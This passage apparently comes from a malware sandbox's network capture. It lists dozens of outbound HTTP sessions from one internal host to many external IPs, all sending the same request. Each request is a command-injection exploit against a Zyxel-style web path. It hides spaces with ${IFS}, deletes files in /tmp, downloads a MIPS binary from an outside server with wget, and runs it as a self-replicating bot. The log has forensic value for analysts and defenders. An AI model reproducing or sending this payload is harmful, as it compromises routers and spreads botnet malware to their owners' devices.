                        2066192.168.2.14543841.123.163.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132519960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2067192.168.2.144659667.92.126.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132539034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2068192.168.2.1447814128.106.236.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132584095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2069192.168.2.145203245.158.153.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132639885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2070192.168.2.144178478.55.44.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132673025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2071192.168.2.143318078.98.94.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132720947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2072192.168.2.145981844.234.78.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132772923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2073192.168.2.1452076164.60.10.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132822037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2074192.168.2.143431652.147.73.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132863998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2075192.168.2.1454820144.168.39.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132916927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2076192.168.2.1442818187.81.241.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132945061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2077192.168.2.144398641.70.11.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132988930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2078192.168.2.1441760185.146.232.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133016109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2079192.168.2.1442168114.40.42.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133066893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2080192.168.2.1449016126.171.151.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133109093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2081192.168.2.1441362101.254.93.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133167028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2082192.168.2.1457280198.229.173.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133183956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2083192.168.2.144738449.3.93.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133235931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2084192.168.2.143417634.17.142.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133276939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2085192.168.2.1440170114.59.220.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133339882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2086192.168.2.1453690212.83.149.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133373976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2087192.168.2.1432882134.9.93.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133435965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2088192.168.2.1441366150.33.77.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133491039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2089192.168.2.1456114143.159.204.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133524895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2090192.168.2.144348854.203.43.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133554935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2091192.168.2.145474652.237.112.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133601904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2092192.168.2.1446010179.208.81.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133656979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2093192.168.2.143885088.51.102.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133703947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2094192.168.2.1454130136.110.220.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133754015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2095192.168.2.1436856164.16.183.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133800030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2096192.168.2.1446776153.38.161.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133836031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2097192.168.2.1446726112.127.84.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133876085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2098192.168.2.145320848.219.254.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133922100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2099192.168.2.145600072.240.158.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133938074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2100192.168.2.1444262204.204.123.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.133999109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2101192.168.2.1457032209.110.225.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134044886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2102192.168.2.144262442.132.87.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134097099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2103192.168.2.144490896.21.103.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134151936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2104192.168.2.143420452.206.154.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134198904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2105192.168.2.143756032.17.131.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134253979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2106192.168.2.144290299.126.204.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134279966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2107192.168.2.1450122147.210.61.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134347916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2108192.168.2.1449986193.106.241.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134373903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2109192.168.2.1447548131.176.243.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134413958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2110192.168.2.1434360177.25.84.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134464025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2111192.168.2.1433256141.23.148.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134500027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2112192.168.2.1440542185.166.128.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134540081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2113192.168.2.145112278.91.110.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134566069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2114192.168.2.1449920174.221.113.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134605885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2115192.168.2.1454566209.156.31.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134643078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2116192.168.2.1447180204.8.224.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134690046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2117192.168.2.145861227.103.49.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134742022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2118192.168.2.144366447.174.153.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134778023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2119192.168.2.1437784211.99.218.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134824038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2120192.168.2.1451570210.50.138.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134871006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2121192.168.2.1434948177.85.100.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134916067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2122192.168.2.1446142129.232.243.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134949923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2123192.168.2.145312098.48.163.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.134974957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2124192.168.2.1459976211.50.66.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135025024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2125192.168.2.1449120142.105.128.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135063887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2126192.168.2.1433342151.82.239.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135132074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2127192.168.2.144098457.38.104.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135165930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2128192.168.2.145445258.136.242.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135207891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2129192.168.2.145121846.102.133.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135262966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2130192.168.2.144385852.248.111.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135322094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2131192.168.2.1451516112.73.244.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135354042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2132192.168.2.1442382152.8.135.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135375977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2133192.168.2.1443832137.42.202.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135416031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2134192.168.2.1434788201.190.103.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135472059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2135192.168.2.143935425.45.105.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135514975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


